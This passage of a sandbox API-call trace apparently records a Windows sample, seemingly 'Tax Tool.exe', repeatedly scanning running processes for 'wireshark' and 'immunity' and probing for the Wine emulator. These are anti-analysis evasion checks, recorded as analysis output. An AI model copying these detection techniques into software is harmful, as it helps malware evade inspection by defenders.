(lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0055.830] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.830] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0055.830] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0055.831] StrStrIW (lpFirst="spoolsv.exe", lpSrch="wireshark") returned 0x0 [0055.831] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.832] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0055.832] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x550, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.832] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0055.832] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0055.833] StrStrIW (lpFirst="sihost.exe", lpSrch="wireshark") returned 0x0 [0055.833] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x728, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0055.834] StrStrIW (lpFirst="taskhostw.exe", lpSrch="wireshark") returned 0x0 [0055.834] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0055.834] StrStrIW (lpFirst="explorer.exe", lpSrch="wireshark") returned 0x0 [0055.834] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0055.835] StrStrIW (lpFirst="RuntimeBroker.exe", lpSrch="wireshark") returned 0x0 [0055.835] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0055.836] StrStrIW (lpFirst="ShellExperienceHost.exe", lpSrch="wireshark") returned 0x0 [0055.836] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0055.836] StrStrIW (lpFirst="SearchUI.exe", lpSrch="wireshark") returned 0x0 [0055.836] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.837] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0055.838] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x320, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0055.838] StrStrIW (lpFirst="UsoClient.exe", lpSrch="wireshark") returned 0x0 [0055.838] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x320, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0055.839] StrStrIW (lpFirst="taskhostw.exe", lpSrch="wireshark") returned 0x0 [0055.839] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0055.840] StrStrIW (lpFirst="WMIADAP.exe", lpSrch="wireshark") returned 0x0 [0055.840] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0055.840] StrStrIW (lpFirst="sppsvc.exe", lpSrch="wireshark") returned 0x0 [0055.840] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x718, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0055.841] StrStrIW (lpFirst="conhost.exe", lpSrch="wireshark") returned 0x0 [0055.841] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0055.842] StrStrIW (lpFirst="backgroundTaskHost.exe", lpSrch="wireshark") returned 0x0 [0055.842] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0055.843] StrStrIW (lpFirst="backgroundTaskHost.exe", lpSrch="wireshark") returned 0x0 [0055.843] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0055.844] StrStrIW (lpFirst="WmiPrvSE.exe", lpSrch="wireshark") returned 0x0 [0055.844] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0055.845] StrStrIW (lpFirst="dllhost.exe", lpSrch="wireshark") returned 0x0 [0055.845] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0055.846] StrStrIW (lpFirst="audiodg.exe", lpSrch="wireshark") returned 0x0 [0055.846] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.849] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0055.849] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0055.849] StrStrIW (lpFirst="dllhost.exe", lpSrch="wireshark") returned 0x0 [0055.849] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0055.850] StrStrIW (lpFirst="dllhost.exe", lpSrch="wireshark") returned 0x0 [0055.850] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x990, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="Tax Tool.exe")) returned 1 [0055.851] StrStrIW (lpFirst="Tax Tool.exe", lpSrch="wireshark") returned 0x0 [0055.851] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0055.851] StrStrIW (lpFirst="taskhostw.exe", lpSrch="wireshark") returned 0x0 [0055.852] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 0 [0055.852] CloseHandle (hObject=0x1e0) returned 1 [0055.853] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76460000 [0055.853] GetProcAddress (hModule=0x76460000, lpProcName="wine_get_unix_file_name") returned 0x0 [0055.854] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\WINE", ulOptions=0x0, samDesired=0x1, phkResult=0x9af80c | out: phkResult=0x9af80c*=0x0) returned 0x2 [0055.854] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\WINE", ulOptions=0x0, samDesired=0x1, phkResult=0x9af80c | out: phkResult=0x9af80c*=0x0) returned 0x2 [0055.854] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e0 [0055.858] Process32FirstW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0055.858] StrStrIW (lpFirst="[System Process]", lpSrch="immunity") returned 0x0 [0055.858] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0055.862] StrStrIW (lpFirst="System", lpSrch="immunity") returned 0x0 [0055.863] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0055.863] StrStrIW (lpFirst="smss.exe", lpSrch="immunity") returned 0x0 [0055.863] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.864] StrStrIW (lpFirst="csrss.exe", lpSrch="immunity") returned 0x0 [0055.864] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0055.864] StrStrIW (lpFirst="wininit.exe", lpSrch="immunity") returned 0x0 [0055.865] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.865] StrStrIW (lpFirst="csrss.exe", lpSrch="immunity") returned 0x0 [0055.865] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0055.866] StrStrIW (lpFirst="winlogon.exe", lpSrch="immunity") returned 0x0 [0055.866] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0055.866] StrStrIW (lpFirst="services.exe", lpSrch="immunity") returned 0x0 [0055.866] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0055.867] StrStrIW (lpFirst="lsass.exe", lpSrch="immunity") returned 0x0 [0055.867] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.868] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0055.868] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.869] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0055.869] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c4, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0055.870] StrStrIW (lpFirst="dwm.exe", lpSrch="immunity") returned 0x0 [0055.870] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.870] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0055.870] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.871] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0055.871] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x354, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.872] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0055.872] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.872] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0055.872] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.873] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0055.873] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.874] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0055.874] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0055.874] StrStrIW (lpFirst="spoolsv.exe", lpSrch="immunity") returned 0x0 [0055.874] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.875] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0055.875] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x550, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.876] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0055.876] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0055.876] StrStrIW (lpFirst="sihost.exe", lpSrch="immunity") returned 0x0 [0055.877] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x728, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0055.877] StrStrIW (lpFirst="taskhostw.exe", lpSrch="immunity") returned 0x0 [0055.877] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0055.878] StrStrIW (lpFirst="explorer.exe", lpSrch="immunity") returned 0x0 [0055.878] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0055.878] StrStrIW (lpFirst="RuntimeBroker.exe", lpSrch="immunity") returned 0x0 [0055.878] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0055.879] StrStrIW (lpFirst="ShellExperienceHost.exe", lpSrch="immunity") returned 0x0 [0055.879] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0055.881] StrStrIW (lpFirst="SearchUI.exe", lpSrch="immunity") returned 0x0 [0055.881] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.882] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0055.882] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x320, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0055.883] StrStrIW (lpFirst="UsoClient.exe", lpSrch="immunity") returned 0x0 [0055.883] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x320, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0055.884] StrStrIW (lpFirst="taskhostw.exe", lpSrch="immunity") returned 0x0 [0055.884] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0055.885] StrStrIW (lpFirst="WMIADAP.exe", lpSrch="immunity") returned 0x0 [0055.885] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0055.886] StrStrIW (lpFirst="sppsvc.exe", lpSrch="immunity") returned 0x0 [0055.886] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x718, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0055.886] StrStrIW (lpFirst="conhost.exe", lpSrch="immunity") returned 0x0 [0055.886] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0055.887] StrStrIW (lpFirst="backgroundTaskHost.exe", lpSrch="immunity") returned 0x0 [0055.887] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0055.888] StrStrIW (lpFirst="backgroundTaskHost.exe", lpSrch="immunity") returned 0x0 [0055.888] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0055.888] StrStrIW (lpFirst="WmiPrvSE.exe", lpSrch="immunity") returned 0x0 [0055.888] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0055.889] StrStrIW (lpFirst="dllhost.exe", lpSrch="immunity") returned 0x0 [0055.889] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, 